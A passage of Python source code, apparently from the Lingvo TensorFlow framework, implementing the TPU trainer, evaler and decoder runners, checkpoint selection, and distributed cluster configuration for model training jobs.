model_task = self._model.SampleTask(global_step) if self._task_probs_summary_writers: for index, prob in enumerate(self._model.task_schedule.cur_probs): self._SummarizeValue(global_step, 'task_probability', prob, self._task_probs_summary_writers[index]) try: for index, task in enumerate(self._model.tasks): self._SummarizeValue(global_step, 'task_weight', sess.run(task.vars.task_weight), self._task_probs_summary_writers[index]) except AttributeError: pass _, global_step, eval_metrics, per_example_tensors = sess.run([ model_task.train_op, py_utils.GetGlobalStep(), model_task.eval_metrics, model_task.per_example_tensors, ]) msg = 'step:%6d' % global_step for key, (val, _) in sorted(six.iteritems(eval_metrics)): msg += ' %s:%.8g' % (key, val) self._SummarizeValue(global_step, key, val, self._summary_writer) model_task.ProcessFPropResults(sess, global_step, eval_metrics, per_example_tensors) if global_step >= next_status_step: self._SetStatusMessage(msg) next_status_step = global_step + status_interval_steps else: tf.logging.info(msg) self._model.ProcessFPropResults(sess, global_step, eval_metrics, per_example_tensors) class TrainerTpu(base_runner.BaseRunner): """Trainer on TPU.""" def __init__(self, *args, **kwargs): super(TrainerTpu, self).__init__(*args, **kwargs) # Multiple TPU trainer tasks not tested/implemented. 
assert self._cluster.num_replicas == 1 data_parallelism = self._cluster.num_splits_per_client assert data_parallelism num_devices_per_split = self._cluster.num_devices_per_split tf.logging.info('data_parallelism: %d, num_devices_per_split: %d', data_parallelism, num_devices_per_split) self._steps_per_loop = min(self.params.train.tpu_steps_per_loop, self.params.train.max_steps) self._initialized = threading.Event() tf.logging.info( 'Creating TrainerTpu using data parallelism %s ' 'and %s steps_per_loop', data_parallelism, self._steps_per_loop) @py_utils.RetryOnTransientTfError() def _WaitTillInit(): """Wait until the model is ready.""" try: # tpu.initialize_system() is called with None as embedding_config, as # embedding_config is not available yet. Later in _Loop, it is called # with the correct embedding_config. Since it cannot be called twice in # the same graph with different embedding_config, we use a dummy_graph # here. dummy_graph = tf.Graph() with dummy_graph.as_default(): tpu_initialize_system_op = tf.tpu.initialize_system( embedding_config=None, job=None) with self._GetSession(graph=dummy_graph) as sess: topology = sess.run(tpu_initialize_system_op) device_assignment = device_assignment_lib.device_assignment( topology, computation_shape=ComputationShape(num_devices_per_split), num_replicas=data_parallelism) py_utils.SetTpuDeviceAssignment(device_assignment) tf.logging.info('device_assignment.core_assignment: %s', str(device_assignment.core_assignment)) tf.logging.info('device_assignment.topology.device_coordinates: %s', str(device_assignment.topology.device_coordinates)) except py_utils.transient_tf_errors as e: tf.logging.info('TPU initialization failed: %s', e) raise _WaitTillInit() with self._graph.as_default(), tf.container(self._container_id): with self._cluster, tf.device(self._cluster.job_spec.name): self._eval_metrics = metrics.TpuEvalMetrics() def TpuTrainStep(*args): """Train a shard of a batch on a single TPU core. 
Args: *args: metrics values from previous steps. Returns: New summed metrics values and a train_op. """ self._model = self.params.Instantiate() self._load_ops = tf.get_collection(py_utils.TPU_EMBEDDING_LOAD_OPS) self._retrieve_ops = tf.get_collection( py_utils.TPU_EMBEDDING_RETRIEVE_OPS) tpu_embedding_collection = tf.get_collection(py_utils.TPU_EMBEDDING) self._tpu_embedding = ( tpu_embedding_collection[0] if tpu_embedding_collection else None) self._model.ConstructFPropBPropGraph() per_step_eval_metrics = self._eval_metrics.SetMetrics( self._model.GetTask().eval_metrics, args) outfeed_op = self._OutfeedEnqueue( self._model.GetTask().per_example_tensors) summed_metrics = [] assert len(per_step_eval_metrics) == len(args) with tf.control_dependencies([outfeed_op]): for x, y in zip(per_step_eval_metrics, args): summed_metrics.append(x + y) return summed_metrics + [self._model.GetTask().train_op] @tpu_function.on_device_training_loop def TpuTrain(): loop_result = tpu_training_loop.repeat( self._steps_per_loop, TpuTrainStep, inputs=self._eval_metrics.initial_values, name='train_loop') # Final metrics are the avg across self._steps_per_loop steps. return self._eval_metrics.FinalizeMetrics(loop_result) batch_parallel_res = tf.tpu.batch_parallel( TpuTrain, num_shards=data_parallelism, device_assignment=py_utils.GetTpuDeviceAssignment()) outfeed_dequeue_op = self._OutfeedDequeueLoop( self._model.GetTask().per_example_tensors, self._steps_per_loop, self._cluster.num_splits_per_client) # Get metric result from a single replica; they are all same here. 
self._tpu_train_ops = [[t[0] for t in batch_parallel_res], outfeed_dequeue_op] self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) assert not tf.get_collection(py_utils.CLOSE_QUEUE_OPS) tf.logging.info('Trainer number of enqueue ops: %d', len(self.enqueue_ops)) self._summary_writer = self._CreateSummaryWriter(self._train_dir) # Saves the graph def. tf.train.write_graph(self._graph.as_graph_def(), self._train_dir, 'train.pbtxt') def _OutfeedEnqueue(self, per_example_tensors): if not per_example_tensors: return tf.no_op() per_example_tensors = py_utils.NestedMap(per_example_tensors) return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten()) def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices): """Process all per-example tensor outfeed data for a TPU sess.run. Args: per_example_tensors: dict of key -> tensor as generated by TpuTrainStep. num_loops: number of times that TpuTrainStep will be executed by TpuTrain. num_devices: number of TPU cores assigned to this process. Returns: A dict of per-example tensors from the latest TpuTrainStep. """ if not per_example_tensors: return tf.no_op() tensor_shapes = [ py_utils.GetShape(per_example_tensors[key]) for key in sorted(per_example_tensors) ] tensor_types = [ tf.as_dtype(per_example_tensors[key].dtype) for key in sorted(per_example_tensors) ] def LoopBody(i, *input_arrays): """Process outfeed data for a single TpuTrainStep. Args: i: current loop index. *input_arrays: One tf.TensorArray per outfeed tensor. Returns: i+1 (new index) plus post-write tf.TensorArray handles. """ # Outfeed ops execute on each JF node, so they must be located on the # nodes. 
      # Build one dequeue op per (replica, core), pinned to the host device
      # that owns that core.
      outfeed_devices = []
      device_assignment = py_utils.GetTpuDeviceAssignment()
      assert device_assignment
      for replica in range(device_assignment.num_replicas):
        for core in range(device_assignment.num_cores_per_replica):
          with tf.device(device_assignment.host_device(replica, core)):
            outfeed_devices.append(
                tpu_ops.outfeed_dequeue_tuple(
                    tensor_types,
                    tensor_shapes,
                    device_ordinal=device_assignment.tpu_ordinal(
                        replica, core)))
      # Each loop iteration fills the next `num_devices` slots of every array.
      offset = i * num_devices
      output_arrays = list(input_arrays)
      # Each output_array holds a different per-example tensor. We get results
      # for each tensor from each TPU for each TpuTrainStep call.
      for j in range(len(output_arrays)):
        for k in range(len(outfeed_devices)):
          output_arrays[j] = output_arrays[j].write(offset + k,
                                                    outfeed_devices[k][j])
      return tuple([i + 1] + output_arrays)

    def LoopCond(i, *output_arrays):
      # Stop after dequeuing `num_loops` batches of outfeed data.
      del output_arrays
      return i < num_loops

    output_arrays = [
        tf.TensorArray(
            tensor_types[i],
            size=num_loops * num_devices,
            element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes))
    ]
    # Loop once for each time that TpuTrainStep runs.
    output_arrays = tf.while_loop(
        LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
    concatenated_arrays = [array.concat() for array in output_arrays]
    return dict(zip(sorted(per_example_tensors), concatenated_arrays))

  def Start(self):
    # Run training.
    self._RunLoop('trainer', self._Loop)

  def _InfeedLoop(self, sess):
    """Runs the infeed enqueue ops once per TPU training-loop step."""
    tf.logging.info('_InfeedLoop start')
    for _ in range(self._steps_per_loop):
      sess.run(self.enqueue_ops)

  def StartEnqueueOp(self, op):
    # When retrieve ops for TPU embedding is present, we use _InfeedLoop above
    # instead to make sure enqueue and retrieve does not happen at the same
    # time as required by TPU embedding.
    # We can remove this by using a tf.while_loop driven infeed op.
if self._retrieve_ops: return self._RunLoop( 'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op]) def _SummarizeValue(self, steps, tag, value): self._summary_writer.add_summary( metrics.CreateScalarSummary(tag, value), steps) def _LoopEnqueue(self, op): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return # Wait for _Loop to initialize variables first before attempting to infeed. self._initialized.wait() return super(TrainerTpu, self)._LoopEnqueue(op) def _Loop(self): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return with tf.container(self._container_id), self._GetSession() as sess: config_proto = ( self._tpu_embedding.config_proto if self._tpu_embedding is not None else None) sess.run( tf.tpu.initialize_system(embedding_config=config_proto, job=None)) sess.run(self.initialize_tables) sess.run(self._initialize_local_vars) if FLAGS.run_locally == 'tpu': sess.run(tf.global_variables_initializer()) gsteps = py_utils.GetGlobalStep() global_step = sess.run(gsteps) self._initialized.set() eval_metrics = None sess.run(self._load_ops) while True: if self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics): # Early terminate gracefully by setting a new max step horizon: three # more TPU steps to ensure that the enqueue ops can gracefully # terminate as well. 
          if self._max_steps is None:
            self._max_steps = global_step + 3 * self._steps_per_loop
            tf.logging.info('Early stopping at step: %d', self._max_steps)

        if self._ShouldStop(sess, global_step):
          tf.logging.info('Training finished.')
          return

        # With TPU embedding, infeed must run concurrently with the train op
        # but must not overlap the retrieve ops below.
        if self._retrieve_ops:
          infeed_loop_thread = threading.Thread(
              target=self._InfeedLoop, args=(sess,))
          infeed_loop_thread.start()

        values, outfeeds = sess.run(self._tpu_train_ops)

        if self._retrieve_ops:
          infeed_loop_thread.join()
          tf.logging.info('Retrieve params.')
          sess.run(self._retrieve_ops)
          tf.logging.info('Retrieve params done.')

        eval_metrics = self._eval_metrics.PackMetricsValues(values)

        # Note: global_step is incremented by self._steps_per_loop by the
        # previous sess.run call.
        global_step = sess.run(gsteps)
        msg = 'step:%6d' % global_step
        for key, (val, _) in sorted(six.iteritems(eval_metrics)):
          msg += ' %s:%.8g' % (key, val)
          self._SummarizeValue(global_step, key, val)
        self._SetStatusMessage(msg)

        task = self._model.GetTask()
        if not task.per_example_tensors:
          outfeeds = {}
        task.ProcessFPropResults(sess, global_step, eval_metrics, outfeeds)
        self._model.ProcessFPropResults(sess, global_step, eval_metrics,
                                        outfeeds)


def _GetSpecificCheckpoint(load_checkpoint_from):
  """Returns a specific checkpoint given `load_checkpoint_from`.

  When load_checkpoint_from is a directory, we find the latest
  checkpoint in the directory and use that as the checkpoint
  to evaluate.

  When load_checkpoint_from is a specific checkpoint, we
  validate the path and return it.

  Args:
    load_checkpoint_from: If not None, specifies the directory or specific
      checkpoint to load.  If a directory, the latest checkpoint in the
      directory will be used.

  Returns:
    The checkpoint path to load, or None when no location was specified.

  Raises:
    ValueError: if `load_checkpoint_from` is neither a directory nor a valid
      checkpoint prefix (no `.index` file found).
  """
  if not load_checkpoint_from:
    # No location specified, use existing train_dir.
    return None

  # If load_checkpoint_from is a directory, return the latest
  # checkpoint in the directory.
  if tf.io.gfile.isdir(load_checkpoint_from):
    return tf.train.latest_checkpoint(load_checkpoint_from)

  # We assume that load_checkpoint_from is a specific checkpoint to
  # evaluate since it is not a directory.
  #
  # Check validity of eval path by looking for the index file.
  if tf.io.gfile.exists(load_checkpoint_from + '.index'):
    return load_checkpoint_from

  # Fail if we see an unexpected load_checkpoint_from.
  #
  # This might happen if load_checkpoint_from refers to a checkpoint
  # but the index file cannot be found.
  raise ValueError('Invalid load_checkpoint_from: %s' % load_checkpoint_from)


class Evaler(base_runner.BaseRunner):
  """Evaler."""

  def __init__(self, eval_type, *args, **kwargs):
    """Constructs an evaler for the dataset named by `eval_type`."""
    super(Evaler, self).__init__(*args, **kwargs)
    self._job_name = 'evaler_' + eval_type
    self._output_name = 'eval_' + eval_type
    self.params.is_eval = True
    self._eval_dir = os.path.join(self._logdir, self._output_name)
    if self._model_task_name:
      self._eval_dir += '_' + str(self._model_task_name)
    tf.gfile.MakeDirs(self._eval_dir)
    self._eval_path = _GetSpecificCheckpoint(
        self.params.task.eval.load_checkpoint_from)
    self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
    # Only the job matching --vizier_reporting_job reports trial metrics.
    self._should_report_metrics = self._job_name.startswith(
        FLAGS.vizier_reporting_job)

    with self._graph.as_default(), tf.container(self._container_id):
      with self._cluster, tf.device(self._cluster.GetPlacer()):
        self._model = self.params.Instantiate()
        self._params = self._model.params
        # Always create the same graph to make sure node names are always
        # exactly the same.
        self._model.ConstructFPropGraph()
        self._model_task = self._model.GetTask(self._model_task_name)
        self._saver = self._GetSaver()
      self.initialize_tables = tf.tables_initializer()
      self._initialize_local_vars = tf.local_variables_initializer()
      # No queues are allowed for eval models.
      self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
      assert not self.enqueue_ops

    # Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt') if self.params.cluster.task == 0: tf.train.write_graph(self._graph.as_graph_def(), self._eval_dir, '%s.pbtxt' % self._output_name) def Start(self): self._RunLoop(self._job_name, self._Loop) def _Loop(self): """The main loop.""" with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) if self._eval_path: self._EvalOnce(self._eval_path, sess) else: path = None while True: path = self._FindNewCheckpoint(path, sess) if not path or self._EvalOnce(path, sess): break # Maybe evaluate the last checkpoint if we are not given a specific # checkpoint to evaluate. if self._eval_path is None: self.EvalLatestCheckpoint(path) if self._should_report_metrics: self._trial.ReportDone() tf.logging.info('Evaluation finished.') def EvalLatestCheckpoint(self, last_path=None): """Runs eval once on the latest checkpoint.""" with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) path = tf.train.latest_checkpoint(self._train_dir) if not path: tf.logging.info('No checkpoint available.') return elif path == last_path: tf.logging.info('Latest checkpoint was already evaluated.') return self._EvalOnce(path, sess) def _EvalOnce(self, path, sess): """Runs evaluation for a batch of samples. Args: path: checkpoint path. sess: the tf Session. Returns: should_stop. """ if not FLAGS.evaler_in_same_address_as_controller: self._LoadCheckpointForEval(sess, path) global_step = sess.run(py_utils.GetGlobalStep()) # Check after how many steps checkpoint got saved. # And decide whether to run an evaluation. 
    # Skip evaluation of checkpoints earlier than start_eval_after.
    if global_step < self._model_task.params.eval.start_eval_after:
      return False
    metrics_dict = {
        name: metrics.AverageMetric() for name in self._model_task.eval_metrics
    }
    num_samples_metric = metrics_dict['num_samples_in_batch']
    # Keep running eval batches until enough samples have been accumulated.
    while (num_samples_metric.total_value <
           self._model_task.params.eval.samples_per_summary):
      # NOTE: We intentionally do not let FProp generate summaries by default,
      # because evaler calls FProp multiple times for each checkpoint. Multiple
      # summaries at the same step is often confusing. Instead, models should
      # update eval_metrics and generate aggregate summaries.
      ans = sess.run(self._model_task.eval_metrics)
      for name, (value, weight) in six.iteritems(ans):
        metrics_dict[name].Update(value, weight)
      tf.logging.info('Total examples done: %d/%d',
                      num_samples_metric.total_value,
                      self._model_task.params.eval.samples_per_summary)

    # Replace average values with total values for certain metrics.
    # (total_weight=1.0 turns an AverageMetric's value into a plain sum.)
    if 'num_predictions' in metrics_dict:
      metrics_dict['num_predictions'].total_weight = 1.0
    if 'num_words' in metrics_dict:
      metrics_dict['num_words'].total_weight = 1.0

    # When we have evaluated so many samples, generate a summary.
    self._WriteSummaries(
        self._summary_writer,
        os.path.basename(self._eval_dir),
        global_step,
        {k: v.Summary(k) for k, v in six.iteritems(metrics_dict)},
        text_filename=os.path.join(self._eval_dir,
                                   'score-{:08d}.txt'.format(global_step)))

    should_stop = global_step >= self.params.train.max_steps
    if self._should_report_metrics:
      trial_should_stop = self._trial.ReportEvalMeasure(global_step,
                                                        metrics_dict, path)
      should_stop = should_stop or trial_should_stop
    return should_stop


def GetDecoderDir(logdir, decoder_type, model_task_name):
  """Returns the output directory for `decoder_type` under `logdir`.

  The task name is appended for multi-task models so each task's decoder
  output goes to its own directory.
  """
  if model_task_name:
    decoder_dir = '%s_%s' % (decoder_type, model_task_name)
  else:
    decoder_dir = decoder_type
  return os.path.join(logdir, decoder_dir)


def _GetCheckpointIdForDecodeOut(checkpoint_path, global_step):
  """Retrieve the checkpoint id for the decoder out file.

  Finds the checkpoint id in the checkpoint file name and compares to global
  step. If they diverge, uses the retrieved id and prints a warning.

  Args:
    checkpoint_path: path to checkpoint file.
    global_step: int specifying the global step of the model.

  Returns:
    Checkpoint id as int.
  """
  ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path))
  tf.logging.info('Loaded checkpoint is at global step: %d', global_step)
  tf.logging.info('Checkpoint path: %s', checkpoint_path)
  tf.logging.info('Checkpoint id according to checkpoint path: %d',
                  ckpt_id_from_file)
  if global_step != ckpt_id_from_file:
    # The filename id wins: it keeps decoder_out file names consistent with
    # the checkpoint files they came from.
    tf.logging.warning(
        'Checkpoint id %d != global step %d. '
        'Will use checkpoint id from checkpoint file for '
        'writing decoder output.', ckpt_id_from_file, global_step)
  return ckpt_id_from_file


class Decoder(base_runner.BaseRunner):
  """Decoder."""

  def __init__(self, decoder_type, *args, **kwargs):
    """Constructs a decoder for the dataset named by `decoder_type`."""
    super(Decoder, self).__init__(*args, **kwargs)
    self._job_name = 'decoder_' + decoder_type
    self.params.is_eval = True
    self._decoder_dir = GetDecoderDir(self._logdir, self._job_name,
                                      self._model_task_name)
    tf.gfile.MakeDirs(self._decoder_dir)
    self._decode_path = _GetSpecificCheckpoint(
        self.params.task.eval.load_checkpoint_from)
    self._summary_writer = self._CreateSummaryWriter(self._decoder_dir)
    # Only the job matching --vizier_reporting_job reports trial metrics.
    self._should_report_metrics = self._job_name.startswith(
        FLAGS.vizier_reporting_job)

    with self._graph.as_default(), tf.container(self._container_id):
      with self._cluster, tf.device(self._cluster.GetPlacer()):
        self._model = self.params.Instantiate()
        self._params = self._model.params
        self._model_task = self._model.GetTask(self._model_task_name)
        # Note, different graphs are being constructed for different model
        # tasks, which may result in different node names being chosen.
        # Obviously, variable names has to be stay the same between train and
        # decode.
cluster = self._cluster with tf.device(cluster.input_device): input_batch = ( self._model_task.input_generator.GetPreprocessedInputBatch()) self._dec_output = self._model_task.Decode(input_batch) self._saver = self._GetSaver() self._summary_op = tf.summary.merge_all() self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() # No queues are allowed for decoder models. self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) assert not self.enqueue_ops # Saves the graph def. self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt') if self.params.cluster.task == 0: tf.train.write_graph(self._graph.as_graph_def(), self._decoder_dir, '%s.pbtxt' % self._job_name) def Start(self): self._RunLoop(self._job_name, self._Loop) def _Loop(self): with tf.container( self._container_id), self._GetSession(inline=False) as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) if self._decode_path: self.DecodeCheckpoint(sess, self._decode_path) else: path = None while True: path = self._FindNewCheckpoint(path, sess) if not path or self.DecodeCheckpoint(sess, path): break # Maybe decode the last checkpoint if we are not given a specific # checkpoint to decode. 
if self._decode_path is None: self.DecodeLatestCheckpoint(path) if self._should_report_metrics: self._trial.ReportDone() tf.logging.info('Decoding finished.') @classmethod def GetDecodeOutPath(cls, decoder_dir, checkpoint_id): """Gets the path to decode out file.""" out_dir = cls._GetTtlDir(decoder_dir, duration='7d') return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id) def DecodeCheckpoint(self, sess, checkpoint_path): """Decodes `samples_per_summary` examples using `checkpoint_path`.""" p = self._model_task.params samples_per_summary = p.eval.decoder_samples_per_summary if not samples_per_summary: samples_per_summary = p.eval.samples_per_summary self._LoadCheckpointForEval(sess, checkpoint_path) global_step = sess.run(py_utils.GetGlobalStep()) dec_metrics = self._model_task.CreateDecoderMetrics() buffered_decode_out = [] num_examples_metric = dec_metrics['num_samples_in_batch'] start_time = time.time() while num_examples_metric.total_value < samples_per_summary: tf.logging.info('Fetching dec_output.') fetch_start = time.time() run_options = config_pb2.RunOptions( report_tensor_allocations_upon_oom=False) if self._summary_op is None: # No summaries were collected. 
dec_out = sess.run(self._dec_output, options=run_options) else: dec_out, summary = sess.run([self._dec_output, self._summary_op], options=run_options) self._summary_writer.add_summary(summary, global_step) post_process_start = time.time() tf.logging.info('Done fetching (%f seconds)' % (post_process_start - fetch_start)) decode_out = self._model_task.PostProcessDecodeOut(dec_out, dec_metrics) if decode_out: buffered_decode_out.extend(decode_out) tf.logging.info( 'Total examples done: %d/%d ' '(%f seconds decode postprocess)', num_examples_metric.total_value, samples_per_summary, time.time() - post_process_start) summaries = {k: v.Summary(k) for k, v in six.iteritems(dec_metrics)} elapsed_secs = time.time() - start_time example_rate = num_examples_metric.total_value / elapsed_secs summaries['examples/sec'] = metrics.CreateScalarSummary( 'examples/sec', example_rate) self._WriteSummaries( self._summary_writer, os.path.basename(self._decoder_dir), global_step, summaries, text_filename=os.path.join(self._decoder_dir, 'score-{:08d}.txt'.format(global_step))) self._ExportMetrics( decode_checkpoint=global_step, dec_metrics=dec_metrics, example_rate=example_rate) if buffered_decode_out: # global_step and the checkpoint id from the checkpoint file might be # different. For consistency of checkpoint filename and decoder_out # file, use the checkpoint id as derived from the checkpoint filename. 
checkpoint_id = _GetCheckpointIdForDecodeOut(checkpoint_path, global_step) decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id) self._WriteKeyValuePairs(decode_out_path, buffered_decode_out) should_stop = global_step >= self.params.train.max_steps if self._should_report_metrics: trial_should_stop = self._trial.ReportEvalMeasure(global_step, dec_metrics, checkpoint_path) should_stop = should_stop or trial_should_stop return should_stop def DecodeLatestCheckpoint(self, last_path=None): """Runs decoder on the latest checkpoint.""" with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) path = tf.train.latest_checkpoint(self._train_dir) if not path: tf.logging.info('No checkpoint available.') return elif path == last_path: tf.logging.info('Latest checkpoint was already decoded.') return self.DecodeCheckpoint(sess, path) class RunnerManager(object): """Helper class for managing runners.""" # This is a hack so these classes can be overridded with internal # non-public implementations. # pylint: disable=invalid-name inference_graph_exporter = inference_graph_exporter model_registry = model_registry Controller = Controller Trainer = Trainer TrainerTpu = TrainerTpu Evaler = Evaler Decoder = Decoder # pylint: enable=invalid-name def __init__(self, model): self._model_name = model def MaybeLaunchTensorFlow(self): """Starts TF machinary in this process.""" if FLAGS.run_locally: return tf.logging.info('Launching tensorflow.') target = FLAGS.tf_master if not target.startswith('localhost'): # E.g., trainer_client is configured w/ FLAGS.tf_master pointing to # another job. In that case, start a local server. 
job_specs = FLAGS.cluster_spec.split('@') cluster_spec_dict = {} for job_spec in job_specs: # ps_host=worker1:1231,worker2:1234 job_machines = job_spec.split('=') if len(job_machines) != 2: raise ValueError('Invalid job specification: %s', job_spec) cluster_spec_dict[job_machines[0]] = job_machines[1].split(',') self._tf_server = tf.train.Server( tf.train.ClusterSpec(cluster_spec_dict), job_name=FLAGS.job, task_index=FLAGS.task) target = self._tf_server.target if not FLAGS.tf_master: FLAGS.tf_master = target with tf.Session(target).as_default(): value = (tf.constant(1.) + tf.constant(1.)).eval() assert value == 2.0, 'Something is really wrong.' tf.logging.info('Launched tensorflow.') def GetParamsForDataset(self, job_name, dataset_name): """Returns params for job `job_name` on the dataset `dataset_name`.""" # Get the current cluster and update its params from flags. cluster = cluster_factory.Current() self.UpdateClusterParamsFromFlags(cluster.params, job_name) with cluster_factory.Cluster(cluster.params): try: cfg = self.model_registry.GetParams(self._model_name, dataset_name) except AttributeError as e: dataset_name_retry = dataset_name.title() tf.logging.warning( 'Exception configuring dataset %s, retrying as %s: %s', dataset_name, dataset_name_retry, e) cfg = self.model_registry.GetParams(self._model_name, dataset_name_retry) tf.logging.warning('Succeeded after retrying as %s.' % dataset_name_retry) cfg.cluster = cluster.params # Updates a few params based on flags. 
if FLAGS.enqueue_max_steps: cfg.train.enqueue_max_steps = FLAGS.enqueue_max_steps if FLAGS.saver_max_to_keep: cfg.train.save_max_to_keep = FLAGS.saver_max_to_keep if FLAGS.saver_keep_checkpoint_every_n_hours: cfg.train.save_keep_checkpoint_every_n_hours = FLAGS.saver_keep_checkpoint_every_n_hours return cfg def MaybeConfigRunDistributed(self): """If given a `FLAGS.cluster_spec`, update flags for running distributed.""" if not FLAGS.cluster_spec: return job_specs = FLAGS.cluster_spec.split('@') cluster_spec_dict = {} for job_spec in job_specs: # ps_host=worker1:1231,worker2:1234 job_machines = job_spec.split('=') if len(job_machines) != 2: raise ValueError('Invalid job specification: %s', job_spec) cluster_spec_dict[job_machines[0]] = job_machines[1].split(',') if FLAGS.job == 'trainer_client': FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task] for job in cluster_spec_dict.keys(): if job.startswith('decoder_'): assert len(job_specs) == 1, 'Decoder jobs must run on their own' assert ',' not in job_specs[0], 'Only single machine supported' FLAGS.decoder_job = '/job:%s' % job FLAGS.decoder_replicas = 1 if job.startswith('evaler_'): assert len(job_specs) == 1, 'Evaler jobs must run on their own' assert ',' not in job_specs[0], 'Only single machine supported' FLAGS.evaler_job = '/job:%s' % job FLAGS.evaler_replicas = 1 if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client', 'worker'): FLAGS.worker_job = '/job:worker' FLAGS.worker_replicas = len(cluster_spec_dict['worker']) FLAGS.ps_job = '/job:worker' FLAGS.ps_replicas = FLAGS.worker_replicas if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'): FLAGS.worker_job = '/job:trainer' FLAGS.worker_replicas = len(cluster_spec_dict['trainer']) FLAGS.ps_job = '/job:ps' FLAGS.ps_replicas = len(cluster_spec_dict['ps']) def UpdateClusterParamsFromFlags(self, cluster, job_name): """Update `cluster` with a training cluster configuration from flags.""" cluster.mode = 
FLAGS.mode cluster.job = job_name cluster.task = FLAGS.task cluster.controller.name = FLAGS.controller_job cluster.controller.gpus_per_replica = FLAGS.controller_gpus cluster.worker.name = FLAGS.worker_job cluster.worker.replicas = FLAGS.worker_replicas cluster.worker.gpus_per_replica = FLAGS.worker_gpus cluster.worker.tpus_per_replica = FLAGS.worker_tpus cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts cluster.worker.devices_per_split = FLAGS.worker_split_size cluster.ps.name = FLAGS.ps_job cluster.ps.replicas = FLAGS.ps_replicas cluster.ps.gpus_per_replica = FLAGS.ps_gpus cluster.input.name = FLAGS.input_job cluster.input.replicas = FLAGS.input_replicas cluster.input.targets = FLAGS.input_targets cluster.evaler.name = FLAGS.evaler_job cluster.evaler.replicas = FLAGS.evaler_replicas cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus cluster.decoder.name = FLAGS.decoder_job cluster.decoder.replicas = FLAGS.decoder_replicas cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial): """Create a runner.""" evaler_job_name_prefix = 'evaler_' decoder_job_name_prefix = 'decoder_' tf.logging.info('Job %s start', job) common_args = (model_task_name, logdir, tf_master, trial) if job == 'controller': cfg = self.GetParamsForDataset('controller', 'Train') return self.Controller(cfg, *common_args) elif job == 'trainer': cfg = self.GetParamsForDataset('trainer', 'Train') return self.Trainer(cfg, *common_args) elif job == 'trainer_client': cfg = self.GetParamsForDataset('trainer_client', 'Train') if py_utils.use_tpu(): return self.TrainerTpu(cfg, *common_args) else: return self.Trainer(cfg, *common_args) elif job.startswith(evaler_job_name_prefix): dataset_name = job[len(evaler_job_name_prefix):] cfg = self.GetParamsForDataset('evaler', dataset_name) return self.Evaler(dataset_name.lower(), cfg, *common_args) elif job.startswith(decoder_job_name_prefix): dataset_name = job[len(decoder_job_name_prefix):] 
cfg = self.GetParamsForDataset('decoder', dataset_name) return self.Decoder(dataset_name.lower(), cfg, *common_args) elif job in ('ps', 'worker', 'input'): self._tf_server.join() else: raise ValueError('job %s is not supported' % job) def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()): """Creates a list of runners based on `FLAGS.mode`. Args: jobs: a list of runner jobs. logdir: the directory used for logging, usually on CNS. trial: optional `Trial` object, used for reporting measures and early stopping. Returns: A list of `.BaseRunner`, one per job in `jobs`. """ runners = [] for j in jobs: tf_master = FLAGS.tf_master # Ensure that decoder or evaler threads do not clobber variables being # updated by trainer by forcing them to use independent sessions. if ('trainer' in jobs and (j.startswith('decoder') or j.startswith('evaler'))): tf_master = '' runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master, trial) runners.append(runner) return runners def StartRunners(self, runners): """Runs `runners` in parallel threads. Returns when all of them finish. Args: runners: a list of `.BaseRunner`. Returns: None. """ threads = [] tf.logging.info('Starting runners') for runner in runners: t = threading.Thread(target=runner.Start) t.daemon = True t.start() threads.append(t) tf.logging.info('Total num runner.enqueue_ops: %d', len(runner.enqueue_ops)) for enqueue_op in runner.enqueue_ops: def StartEnqueue(runner, op): tf.logging.info('Starting enqueue op %s', op.name) return lambda: runner.StartEnqueueOp(op) tq = threading.Thread(target=StartEnqueue(runner, enqueue_op)) tq.start() threads.append(tq) tf.logging.info('Waiting for runners to finish...') for t in threads: while True: t.join(1) if not t.isAlive(): break tf.logging.info('All runners done.') def RunTrial(self, job, logdir, trial): """A wrapper function for running a trial.""" if job == 'all': # For async mode: Run controller, trainer, evaler jobs in one process, # multiple threads. 
